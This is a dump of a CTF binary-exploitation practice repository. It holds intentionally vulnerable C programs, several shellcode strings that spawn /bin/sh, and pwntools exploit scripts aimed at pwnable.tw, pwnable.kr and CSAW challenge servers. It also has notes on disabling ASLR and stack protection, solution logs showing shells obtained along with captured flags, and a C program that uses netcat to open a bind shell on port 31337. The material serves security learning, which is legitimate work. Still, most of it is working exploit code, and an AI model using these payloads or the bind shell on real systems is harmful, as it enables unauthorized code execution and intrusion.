-------------------------------------------------------------------------------- /ROP/ROPX86/DEPnoASLR/level1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void vulnerable_function() { 6 | char buf[128]; 7 | read(STDIN_FILENO, buf, 256); 8 | } 9 | 10 | int main(int argc, char** argv) { 11 | vulnerable_function(); 12 | write(STDOUT_FILENO, "Hello, World\n", 13); 13 | } 14 | -------------------------------------------------------------------------------- /ROP/ROPX86/shellcode/level1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void vulnerable_function() { 6 | char buf[128]; 7 | read(STDIN_FILENO, buf, 256); 8 | } 9 | 10 | int main(int argc, char** argv) { 11 | vulnerable_function(); 12 | write(STDOUT_FILENO, "Hello, World\n", 13); 13 | } 14 | -------------------------------------------------------------------------------- /ROP/ROPX86/unprotected/level1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void vulnerable_function() { 6 | char buf[128]; 7 | read(STDIN_FILENO, buf, 256); 8 | } 9 | 10 | int main(int argc, char** argv) { 11 | vulnerable_function(); 12 | write(STDOUT_FILENO, "Hello, World\n", 13); 13 | } 14 | -------------------------------------------------------------------------------- /shellcodeHandbook/SHELLCODE/test_shellcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | char shellcode[] = "\xbb\x00\x00\x00\x00" 4 | "\xb8\x01\x00\x00\x00" 5 | "\xcd\x80"; 6 | 7 | int main(int argc, char **argv) 8 | { 9 | int (*funct)(); 10 | funct = (int (*)()) shellcode; 11 | 12 | (int)(*funct)(); 13 | 14 | } 15 | 16 | -------------------------------------------------------------------------------- /ROP/ROPX64/MEMLEAK_DYNELF/x86xD/level1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void vulnerable_function() { 6 | char buf[128]; 7 | read(STDIN_FILENO, buf, 256); 8 | } 9 | 10 | int main(int argc, char** argv) { 11 | vulnerable_function(); 12 | write(STDOUT_FILENO, "Hello, World\n", 13); 13 | } 14 | -------------------------------------------------------------------------------- /PWNable.tw/CALC/init_pool.c: -------------------------------------------------------------------------------- 1 | void init_pool(undefined4 *param_1) 2 | 3 | { 4 | int local_8; 5 | 6 | *param_1 = 0; 7 | local_8 = 0; 8 | while (local_8 < 100) { 9 | param_1[local_8 + 1] = 0; // only made 0's in our address, from it starts to 100 bytes foreward 10 | local_8 = local_8 + 1; 11 | } 12 | return; 13 | } 14 | -------------------------------------------------------------------------------- /ROP/64LinuxROP/shell1.c: -------------------------------------------------------------------------------- 1 | int main() { 2 | asm("\ 3 | needle0: jmp there\n\ 4 | here: pop %rdi\n\ 5 | xor %rax, %rax\n\ 6 | movb $0x3b, %al\n\ 7 | xor %rsi, %rsi\n\ 8 | xor %rdx, %rdx\n\ 9 | syscall\n\ 10 | there: call here\n\ 11 | .string \"/bin/sh\"\n\ 12 | needle1: .octa 0xdeadbeef\n\ 13 | "); 14 | } 15 | -------------------------------------------------------------------------------- /execv/remote.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main(){ 3 | char *final[1]={NULL}; 4 | char *argumentos[6]={"/bin/nc", 5 | "-lp", 6 | "31337", 7 | "-e", 8 | "/bin/sh", 9 | NULL 10 | }; 11 | execve("/bin/nc", argumentos, final); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /ROP/ROPX86/shellcode/shellcode: -------------------------------------------------------------------------------- 1 | #!c 2 | # execve ("/bin/sh") 3 | # xor ecx, ecx 4 | # mul ecx 5 | # push ecx 6 | # push 0x68732f2f ;; hs// 7 | # push 0x6e69622f ;; nib/ 8 | # mov ebx, esp 9 | # mov al, 11 10 | # int 0x80 11 | 12 | shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73" 13 | shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0" 14 | shellcode += "\x0b\xcd\x80" 15 | -------------------------------------------------------------------------------- /execv/rop.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | void function(char *a){ 5 | char buffer[40]; 6 | printf("[buffer:0x%x] %s", &buffer, a ); 7 | strcpy(buffer, a); 8 | } 9 | 10 | int main(int argc, char ** argv){ 11 | if(argc>=2) 12 | function(argv[1]); 13 | else 14 | printf("usalo asi: %s argumento\n",argv[0]); 15 | return 0; 16 | } -------------------------------------------------------------------------------- /HEAP/HeapLAB/src/demo_fastbins.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char* argv[]) { 5 | 6 | void* a = malloc(1); 7 | void* b = malloc(1); 8 | void* c = malloc(1); 9 | 10 | free(a); 11 | free(b); 12 | free(c); 13 | 14 | void* d = malloc(1); 15 | void* e = malloc(1); 16 | void* f = malloc(1); 17 | 18 | return 0; 19 | } 20 | -------------------------------------------------------------------------------- /execv/comando.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | //int execve = eax 4 | //char filename =ebx 5 | //char *const argv [] =ecx 6 | //char *const envp [] =edx 7 | 8 | int main(){ 9 | 10 | char *final[]={NULL}; //ENVP =edx 11 | char *argumentos[3]={"/bin/ls", //argv= ecx 12 | "-la", 13 | NULL}; 14 | 15 | execve("/bin/ls",argumentos, final); //int execve = eax 16 | return 0; 17 | } 18 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/csaw19_babyboi/baby_boi.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char **argv[]) { 5 | setvbuf(stdout, NULL, _IONBF, 0); 6 | setvbuf(stdin, NULL, _IONBF, 0); 7 | setvbuf(stderr, NULL, _IONBF, 0); 8 | 9 | char buf[32]; 10 | printf("Hello!\n"); 11 | printf("Here I am: %p\n", printf); 12 | gets(buf); 13 | } 14 | -------------------------------------------------------------------------------- /common/commands1: -------------------------------------------------------------------------------- 1 | #!bash 2 | ulimit -c unlimited 3 | sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern' 4 | 5 | #!bash 6 | python pattern.py offset 0x37654136 7 | hex pattern decoded as: 6Ae7 8 | 140 9 | 10 | 11 | python pattern.py create 150 12 | 13 | #!bash 14 | sudo -s 15 | echo 0 > /proc/sys/kernel/randomize_va_space 16 | exit 17 | 18 | gcc -fno-stack-protector -z execstack -o level1 level1.c 19 | -------------------------------------------------------------------------------- /ROP/ROPX86/commands: -------------------------------------------------------------------------------- 1 | #!bash 2 | ulimit -c unlimited 3 | sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern' 4 | 5 | #!bash 6 | python pattern.py offset 0x37654136 7 | hex pattern decoded as: 6Ae7 8 | 140 9 | 10 | 11 | python pattern.py create 150 12 | 13 | #!bash 14 | sudo -s 15 | echo 0 > /proc/sys/kernel/randomize_va_space 16 | exit 17 | 18 | gcc -fno-stack-protector -z execstack -o level1 level1.c 19 | -------------------------------------------------------------------------------- /ROP/ROPX86/shellcode/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | 5 | import struct; 6 | shellcode="\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" 7 | exp=(shellcode +('A'*(140-len(shellcode)))+struct.pack('I',0xffffd210)) 8 | #####################3 9 | 10 | p = process('./level1') 11 | ret = 0xbffff290 12 | 13 | 14 | 15 | #p32(ret) == struct.pack(" p/x av->system_mem 6 | pwndbg> dq av->top 7 | 8 | We were dealing with the top chunk size integrity check, wich waw comparing our fake top chunk size 9 | 10 | -s parameter in system("bin/sh") avoid malformed characterd 11 | -p does not reset uid and still root 12 | 13 | 14 | -------------------------------------------------------------------------------- /ADWorld/dice/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from ctypes import * 3 | p=remote('220.249.52.133','58641') 4 | libc = cdll.LoadLibrary("libc.so.6") 5 | p.recv() 6 | payload=0x40*"a"+p64(0) 7 | p.sendline(payload) 8 | 9 | a=[] 10 | for i in range(50): 11 | a.append(libc.rand(0)) 12 | print(a) 13 | for i in a: 14 | p.recv() 15 | print(p.recv()) 16 | p.sendline(str(i)) 17 | p.interactive() 18 | #cyberpeace{e6fa49618a3baa7d0eaf194dc9494dc9} 19 | -------------------------------------------------------------------------------- /PWNable/flag/flag-soluion: -------------------------------------------------------------------------------- 1 | primero mira con el comando file 2 | ahi encontraras que clase de archivo es 3 | despues mira con strings quiza encontremos algo 4 | encontramos que se empaquto con upx 5 | bueno desempaquetemoslo con upx 6 | ejecutemoslo y veamos lo que dice 7 | okey sigamos esas funciones 8 | es mas sencillo con hooper 9 | usa gdb para ejecutarlo y colocar el break que encontraste gracias 10 | a hooper 11 | imprimamos esa con: printf "%s", 0x6c96b0 12 | -------------------------------------------------------------------------------- /ROP/ROPX86/DEP_ASLR/commands: -------------------------------------------------------------------------------- 1 | #!bash 2 | ulimit -c unlimited 3 | sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern' 4 | 5 | #!bash 6 | python pattern.py offset 0x37654136 7 | hex pattern decoded as: 6Ae7 8 | 140 9 | 10 | 11 | python pattern.py create 150 12 | 13 | #!bash 14 | sudo -s 15 | echo 0 > /proc/sys/kernel/randomize_va_space 16 | exit 17 | 18 | gcc -fno-stack-protector -z execstack -o level1 level1.c 19 | 20 | size --format=sysv printf 21 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/Csaw18-GetIt/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | target = process("./get_it") 4 | #gdb.attach(target, gdbscript = 'b *0x4005f1') 5 | 6 | payload = "" 7 | payload += "0"*40 # Padding to the return address 8 | payload += p64(0x4005b6) # Address of give_shell in least endian, will be new saved return address 9 | 10 | # Send the payload 11 | target.sendline(payload) 12 | 13 | # Drop to an interactive shell to use the new shell 14 | target.interactive() 15 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/csaw17_pilot/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | target=process('./pilot') 4 | 5 | print target.recvline() 6 | 7 | 8 | 9 | addressBuf='\xe0\xdb\xff\xff\xff\x7f\x00\x00' 10 | payload="" 11 | shellcode = "\x31\xF6\x48\xBF\xD1\x9D\x96\x91\xD0\x8C\x97\xFF\x48\xF7\xDF\xF7\xE6\x04\x3B\x57\x54\x5F\x0F\x05" 12 | payload+=shellcode 13 | payload+='A'*(40-len(shellcode)) 14 | payload+=addressBuf 15 | 16 | target.send(payload) 17 | target.interactive() 18 | 19 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/tu17_vulnchat/exp1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | target =process('./vuln-chat') 4 | print target.recvline() 5 | print target.recvuntil(': ') 6 | 7 | payload1="" 8 | payload1+="A"*20 9 | payload1+='%s' 10 | 11 | target.sendline(payload1) 12 | 13 | print target.recvuntil("I know I can trust you?") 14 | 15 | payload2 = "" 16 | payload2 += "1"*49 17 | payload2+='\x6b\x85\x04\x08' 18 | 19 | target.sendline(payload2) 20 | 21 | target.interactive() 22 | 23 | 24 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/Tamula19pwn1/sol.txt: -------------------------------------------------------------------------------- 1 | user@User-Pc:~/home/GIT/IVAN/Pwning/Nightmare/Tamula19pwn1$ (python -c "print 'Sir Lancelot of Camelot'";python -c "print 'To seek the Holy Grail.'";python -c "print 'A'*43+'\xc8\x10\xa1\xde'") | ./pwn1 2 | Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see. 3 | What... is your name? 4 | What... is your quest? 5 | What... is my secret? 6 | Right. Off you go. 7 | 8 | flag{g0ttem_b0yz} 9 | 10 | -------------------------------------------------------------------------------- /ROP/ROPX86/DEPnoASLR/exp.py: -------------------------------------------------------------------------------- 1 | import struct 2 | from pwn import* 3 | 4 | system=0xf7e195a0 5 | sh=0xf7f58b35 6 | ret=0xdeadbeef 7 | 8 | #p=process('./level2') 9 | 10 | #exp= 'A'*140+struct.pack("I",system)+struct.pack("I",ret)+struct.pack("I",sh) 11 | 12 | #exp = ('A'*140)+p32(system) +p32(ret) + p32(sh) 13 | 14 | exp= 'A'*140+struct.pack("I",0xf7e195a0)+struct.pack("I", 0xdeadbeef)+struct.pack("I", 0xf7f58b35) 15 | 16 | print(exp) 17 | 18 | p.send(exp) 19 | p.interactive() 20 | 21 | 22 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/CSAW16-WARMUP/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | target = process('./warmup') 4 | #gdb.attach(target, gdbscript = 'b *0x4006a3') 5 | 6 | # Make the payload 7 | payload = "" 8 | payload += "0"*72 # Overflow the buffer up to the return address 9 | payload += '\x0d\x06\x40\x00\x00\x00\x00\x00' 10 | 11 | #payload += p64(0x40060d) # Overwrite the return address with the address of the `easy` function 12 | 13 | # Send the payload 14 | target.sendline(payload) 15 | print target.recvline() 16 | 17 | -------------------------------------------------------------------------------- /MIPS/hello-world.asm: -------------------------------------------------------------------------------- 1 | .data 2 | miMensaje: .asciiz "HOLA MUNDO\n" 3 | miCaracter: .byte 'I' 4 | miEntero: .word 23 5 | miFloat: .float 3.14 6 | miDouble: .double 7.202 7 | miZero: .double 0 8 | 9 | .text 10 | li $v0, 4 11 | la $a0, miMensaje 12 | syscall 13 | li $v0, 4 14 | la $a0, miCaracter 15 | syscall 16 | li $v0, 1 17 | lw $a0, miEntero 18 | syscall 19 | li $v0, 2 20 | lwc1 $f12, miFloat 21 | syscall 22 | ldc1 $f2, miDouble 23 | ldc1 $f0, miZero 24 | li $v0, 3 25 | add.d $f12, $f2,$f0 26 | syscall 27 | 28 | -------------------------------------------------------------------------------- /common/commands2: -------------------------------------------------------------------------------- 1 | test ex 2 | $readelf -l /path/to/myprogram.set | grep -i stack 3 | $readelf -l /path/to/myprogram.clear | grep -i stack 4 | 5 | disallow code execution in stack 6 | $execstack -c /path/to/myprogram 7 | $execstack -q /path/to/myprogram 8 | 9 | allow code execution in stack 10 | execstack -s ... 11 | execstack -q ... 12 | 13 | disable ASLR 14 | echo 0 > /proc/sys/kernel/randomize_va_space 15 | 16 | randomize stack sapces 17 | echo 1 /proc/sys/kernel/randomize_va_space 18 | 19 | randomize stack and heap sapces 20 | echo 2 /proc/sys/kernel/randomize_va_space 21 | 22 | -------------------------------------------------------------------------------- /PWNable/final0/fianl0: -------------------------------------------------------------------------------- 1 | set disassembly-flavor intel 2 | disassemble main 3 | disassemble 4 | info functions 5 | scp archivo_a_subir.zip root@example.com:/var/www/example.com/ 6 | 7 | scp otro_archivo_a_subir.js miusuario@112.223.4.215:/otra/carpeta/destino/ 8 | 9 | scp usuario@servidor:ruta_servidor_donde_esta_el_archivo ruta_ordenador_local_donde_poner_el_archivo 10 | 11 | scp root@example.com:/var/www/example.com/archivo_a_descargar.html archivo_a_descargar_nombre_en_local.html 12 | 13 | gdb archivodesesnsamble archivocoreentmp 14 | 15 | pidof final0 16 | 17 | gdb -p `pidof final0` 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /docker_suites/ubuntu20-pwndbg/mount/CALLME/x64/exp2.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | binf = ELF("callme") 3 | libc = "libcallme.so" 4 | #p = remote("chall.ctf.bamboofox.tw", 10102) 5 | p=process('callme') 6 | context.terminal = ["tmux", "splitw", "-h"] 7 | gs = ''' 8 | break *0x400882 9 | ''' 10 | 11 | def start(): 12 | if args.GDB: 13 | return gdb.debug(binf.path, gdbscript=gs) 14 | else: 15 | return process(binf.path) 16 | 17 | 18 | context.log_level = "DEBUG" 19 | 20 | print(binf.plt) 21 | 22 | p=start() 23 | #pause() 24 | 25 | p.sendafter("> ", 'A'*1000) 26 | 27 | 28 | p.interactive() 29 | -------------------------------------------------------------------------------- /Templates/patch_in_run_libc.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python3 2 | from pwn import * 3 | 4 | host = '' 5 | puerto = 1234 6 | 7 | binary_name = './BINARY' 8 | context.binary = binary_name 9 | context.log_level = "debug" 10 | binary = context.binary 11 | 12 | if(args['REMOTO']): 13 | p = remote(host, puerto) 14 | else: 15 | p = process(["./ld-linux-x86-64.so.2", "./"], env={"LD_PRELOAD":"./libc.so.6"}) 16 | 17 | if(args['GDB']): 18 | base = p.libs()[binary.path] 19 | comandos_gdb = "" 20 | comandos_gdb += "br *" + hex(0x401757) + "\n" 21 | comandos_gdb += "continue\n" 22 | gdb.attach(p, comandos_gdb) -------------------------------------------------------------------------------- /PWNable.tw/ORW/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | debug = 0 4 | def exploit(): 5 | 6 | shellcode="\x31\xC0\x31\xDB\x31\xC9\x31\xD2\x53\x68\x66\x6C\x61\x67\x68\x6F\x72\x77\x2F\x68\x6F\x6D\x65\x2F\x68\x2F\x2F\x2F\x68\x89\xE3\x6A\x05\x58\x6A\x00\x59\xCD\x80\x89\xC3\x6A\x03\x58\x83\xEC\x32\x54\x59\x6A\x28\x5A\xCD\x80\x6A\x04\x58\x6A\x01\x5B\xCD\x80" 7 | s.recvuntil(':') 8 | s.sendline(shellcode) 9 | print s.recv() 10 | 11 | if __name__ == '__main__': 12 | if debug: 13 | s = process('./orw') 14 | #gdb.attach(s) 15 | #s.pause() 16 | 17 | else: 18 | s = remote('chall.pwnable.tw', 10001) 19 | 20 | exploit() 21 | s.interactive() 22 | s.close() -------------------------------------------------------------------------------- /ROP/ROPX86/DEPnoASLR/sol: -------------------------------------------------------------------------------- 1 | $ gcc -m32 -fno-stack-protector -o level2 level1.c 2 | 3 | //deshabilito proteccion ASLR que rondomiza direcciones, ya lo habia hecho pero se activa luego de un tiempo 4 | 5 | #!bash 6 | sudo -s 7 | echo 0 > /proc/sys/kernel/randomize_va_space 8 | exit 9 | 10 | $ (python -c "import struct;print(('A'*140) + struct.pack('I',0xf7e195a0) + struct.pack('I', 0xdeadbeef)+ struct.pack('I', 0xf7f58b35)*4)"; cat) | ./level2 11 | 12 | id 13 | uid=1000(ivansk8421) gid=1000(ivansk8421) grupos=1000(ivansk8421),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),129(sambashare) 14 | whoami 15 | ivansk8421 16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /docker_suites/ubuntu20-pwndbg/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | 3 | ENV DEBIAN_FRONTEND=noninteractive 4 | 5 | RUN dpkg --add-architecture i386 6 | RUN apt-get -y update --fix-missing && apt-get -y upgrade 7 | RUN apt-get -y install libc6:i386 libncurses5:i386 libstdc++6:i386 8 | RUN apt-get -y install socat gdb git gcc vim 9 | RUN apt-get -y install gcc-multilib 10 | 11 | RUN git clone https://github.com/pwndbg/pwndbg 12 | WORKDIR pwndbg 13 | RUN ./setup.sh 14 | RUN apt-get -y install tmux 15 | RUN apt-get -y install python3 libssl-dev libffi-dev build-essential 16 | RUN apt-get -y install python3-pip 17 | RUN python3 -m pip install --upgrade pwntools 18 | RUN apt-get -y install 19 | 20 | -------------------------------------------------------------------------------- /HEAP/HEAP-ANALYSIS/heap-analysis.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | 6 | int *a =malloc(8); //fast chunk 7 | int *b = malloc (1020); //small chunk 8 | int *c = malloc(8); //fast chunk 9 | int *d = malloc(2046); //large chunk 10 | int *e = malloc(1020); //small chunk 11 | 12 | free (d); // small chunk 'd' will be inserted into unsorted bin 13 | free(c); //fast chunk 'c' will be inserterd in fast bin 14 | free(b); // large chunk 'b' will be inserted in unsorted bin 15 | free(a); // fast bin 'a' will be inserted in fast bin 16 | malloc(8); //allocated one 32 bytes sized fast chunk 17 | malloc(8); // allocated one 32 bytes sizes fast chunk 18 | malloc(3000); //large chunk 19 | 20 | return 0; 21 | } -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/tu18_shellaeasy/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | proc=process('./shella-easy') 4 | 5 | payload='' 6 | padd1=0x40 7 | padd2=0x4c 8 | shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" 9 | target='\xef\xbe\xad\xde' 10 | leak='' 11 | ret='' 12 | 13 | #leak 14 | 15 | leak = proc.recvline() 16 | leak = leak.strip("Yeah I'll have a ") 17 | leak = leak.strip(" with a side of fries thanks\n") 18 | ret = int(leak, 16) 19 | 20 | #payload 21 | 22 | payload+=shellcode+'A'*(padd1-len(shellcode))+target 23 | payload+='B'*(padd2-len(payload)) 24 | payload+=p32(ret) 25 | 26 | #send payload 27 | 28 | proc.sendline(payload) 29 | proc.interactive() 30 | 31 | 32 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/csaw19_babyboi/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Establish the target 4 | target = process('./baby_boi', env={"LD_PRELOAD":"./libc-2.27.so"}) 5 | libc = ELF('libc-2.27.so') 6 | #gdb.attach(target) 7 | 8 | print target.recvuntil("ere I am: ") 9 | 10 | # Scan in the infoleak 11 | leak = target.recvline() 12 | leak = leak.strip("\n") 13 | 14 | base = int(leak, 16) - libc.symbols['printf'] 15 | 16 | print "wooo:" + hex(base) 17 | 18 | # Calculate oneshot gadget 19 | oneshot = base + 0x4f322 20 | 21 | payload = "" 22 | payload += "0"*0x28 # Offset to oneshot gadget 23 | payload += p64(oneshot) # Oneshot gadget 24 | 25 | # Send the payload 26 | target.sendline(payload) 27 | 28 | target.interactive() -------------------------------------------------------------------------------- /PWNable.tw/CALC/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF("calc") 5 | libc = elf.libc 6 | 7 | gs = ''' 8 | continue 9 | ''' 10 | def start(): 11 | if args.GDB: 12 | return gdb.debug(elf.path, gdbscript=gs) 13 | else: 14 | return process(elf.path) 15 | 16 | def calc(n): 17 | io.sendline(n) 18 | return io.recvline() 19 | 20 | 21 | io = start() 22 | 23 | # ============================================================================= 24 | 25 | pay="+5555" 26 | for i in range(0,1325): 27 | pay=pay+"+5555" 28 | 29 | print(pay) 30 | """ print(calc(pay)) """ 31 | 32 | # ============================================================================= 33 | #0x8ccf5e0 34 | 35 | io.interactive() 36 | -------------------------------------------------------------------------------- /PWNable.tw/START/sol: -------------------------------------------------------------------------------- 1 | import socket 2 | from struct import pack, unpack 3 | from binascii import unhexlify 4 | 5 | # Got it via `ragg2 -i exec -b 32` 6 | shellcode = unhexlify('31c050682f2f7368682f62696e89e3505389e199b00b31d2cd80') 7 | 8 | sck = socket.create_connection(('chall.pwnable.tw', 10000)) 9 | #sck = socket.create_connection(('0.0.0.0', 8080)) 10 | 11 | _ = sck.recv(4096) 12 | sck.send(b'\x90' * 20 + pack(' %#x", canary) 25 | 26 | get_flag_addr = 0x4008DA 27 | payload = 'A'*(0x90-8) + p64(canary) + 'A'*8 + p64(get_flag_addr) 28 | fmt_str(payload, 1) 29 | print(payload) 30 | p.interactive() 31 | -------------------------------------------------------------------------------- /PWNable.tw/CALC/eval.c: -------------------------------------------------------------------------------- 1 | void eval(int *param_1,char param_2) //param2, arrayexpr 2 | { 3 | if (param_2 == '+') { 4 | param_1[*param_1 + -1] = param_1[*param_1 + -1] + param_1[*param_1]; 5 | } 6 | else { 7 | if (param_2 < ',') { 8 | if (param_2 == '*') { 9 | param_1[*param_1 + -1] = param_1[*param_1 + -1] * param_1[*param_1]; 10 | } 11 | } 12 | else { 13 | if (param_2 == '-') { 14 | param_1[*param_1 + -1] = param_1[*param_1 + -1] - param_1[*param_1]; 15 | } 16 | else { 17 | if (param_2 == '/') { 18 | param_1[*param_1 + -1] = param_1[*param_1 + -1] / param_1[*param_1]; 19 | } 20 | } 21 | } 22 | } 23 | *param_1 = *param_1 + -1; 24 | return; 25 | } 26 | 27 | -------------------------------------------------------------------------------- /PWNable.tw/START/exp.py: -------------------------------------------------------------------------------- 1 | import struct 2 | from pwn import * 3 | 4 | 5 | 6 | def leak_esp(r): 7 | address_1 = p32(0x08048087) # mov ecx, esp; mov dl, 0x14; mov bl, 1; mov al, 4; int 0x80; 8 | payload = 'A'*20 + address_1 9 | print r.recvuntil('CTF:') 10 | r.send(payload) 11 | esp = u32(r.recv()[:4]) 12 | print "Address of ESP: ", hex(esp) 13 | return esp 14 | 15 | 16 | shellcode = asm('\n'.join([ 17 | 'push %d' % u32('/sh\0'), 18 | 'push %d' % u32('/bin'), 19 | 'xor edx, edx', 20 | 'xor ecx, ecx', 21 | 'mov ebx, esp', 22 | 'mov eax, 0xb', 23 | 'int 0x80', 24 | ])) 25 | 26 | 27 | 28 | if __name__ == "__main__": 29 | 30 | r = remote('chall.pwnable.tw', 10000) 31 | #gdb.attach(r) 32 | esp = leak_esp(r) 33 | payload = "A"*20 + p32(esp + 20) + shellcode 34 | r.send(payload) 35 | r.interactive() 36 | 37 | -------------------------------------------------------------------------------- /HEAP/syscallMalloc/sbrk.c: -------------------------------------------------------------------------------- 1 | /* sbrk and brk example */ 2 | #include 3 | #include 4 | #include 5 | 6 | int main() 7 | { 8 | void *curr_brk, *tmp_brk = NULL; 9 | 10 | printf("Welcome to sbrk example:%d\n", getpid()); 11 | 12 | /* sbrk(0) gives current program break location */ 13 | tmp_brk = curr_brk = sbrk(0); 14 | printf("Program Break Location1:%p\n", curr_brk); 15 | getchar(); 16 | 17 | /* brk(addr) increments/decrements program break location */ 18 | brk(curr_brk+4096); 19 | 20 | curr_brk = sbrk(0); 21 | printf("Program break Location2:%p\n", curr_brk); 22 | getchar(); 23 | 24 | brk(tmp_brk); 25 | 26 | curr_brk = sbrk(0); 27 | printf("Program Break Location3:%p\n", curr_brk); 28 | getchar(); 29 | 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/csaw17_pilot/solution.txt: -------------------------------------------------------------------------------- 1 | user@User-Pc:~/home/GIT/IVAN/Pwning/Nightmare/stackOverflow/csaw17_pilot$ (python -c "addressBuf='\xe0\xdb\xff\xff\xff\x7f\x00\x00';payload='';shellcode='\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05';payload+=shellcode;payload+='A'*(40-len(shellcode));payload+=addressBuf;print payload" ;cat)| ./pilot 2 | [*]Welcome DropShip Pilot... 3 | [*]I am your assitant A.I.... 4 | [*]I will be guiding you through the tutorial.... 5 | [*]As a first step, lets learn how to land at the designated location.... 6 | [*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics... 7 | [*]Good Luck Pilot!.... 8 | [*]Location:0x7fffffffdbe0 9 | [*]Command:whoami 10 | user 11 | ls 12 | exp.txt exploit.py pilot readme.md 13 | echo OK 14 | OK 15 | 16 | -------------------------------------------------------------------------------- /HacktheBox/you_know/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | context.log_level='debug' 4 | #context.terminal = ["terminator", "-e"] 5 | #context.terminal = ["tmux", "splitw", "-h"] 6 | #context.terminal = ['terminator', '--tew-tab', '-x'] 7 | 8 | import time 9 | import struct 10 | elf = context.binary = ELF("./vuln") 11 | libc = elf.libc 12 | # ============================================================================= 13 | gs = ''' 14 | continue 15 | ''' 16 | # ============================================================================= 17 | def start(): 18 | if args.GDB: 19 | return gdb.debug(elf.path, gdbscript=gs) 20 | else: 21 | return process(elf.path) 22 | 23 | exp="" 24 | 25 | # ============================================================================= 26 | io = start() 27 | g = cyclic_gen() 28 | #io.sendafter(" \n", "A"*200) 29 | io.interactive() 30 | -------------------------------------------------------------------------------- /PWNable/BOF/bof-solucion: -------------------------------------------------------------------------------- 1 | AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHHIIIIIJJJJJKKKKKLLLL 2 | 0xcafebabe 3 | \xbe\xba\xfe\xca 4 | 5 | (echo "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM\xbe\xba\xfe\xca"; cat) | nc pwnable.kr 9000) 6 | (echo "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM\xca\xfe\xba\xbe"; cat) | nc pwnable.kr 9000) 7 | AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM\xca\xfe\xba\xbe 8 | 9 | ABCDEFGHIJKLMABCDEFGHIJKLMABCDEFGHIJKLMABCDEFGHIJKLM���� 10 | AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM���� 11 | AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM\xca\xfe\xba\xbe 12 | 13 | 14 | (python -c "print 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM'+'\xbe\xba\xfe\xca'"; cat) | nc pwnable.kr 9000 15 | 16 | 17 | daddy, I just pwned a buFFer :) 18 | 19 | col@prowl:/tmp/someone$ (echo -e "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM\xbe\xba\xfe\xca"; cat) | nc pwnable.kr 9000 20 | 21 | -------------------------------------------------------------------------------- 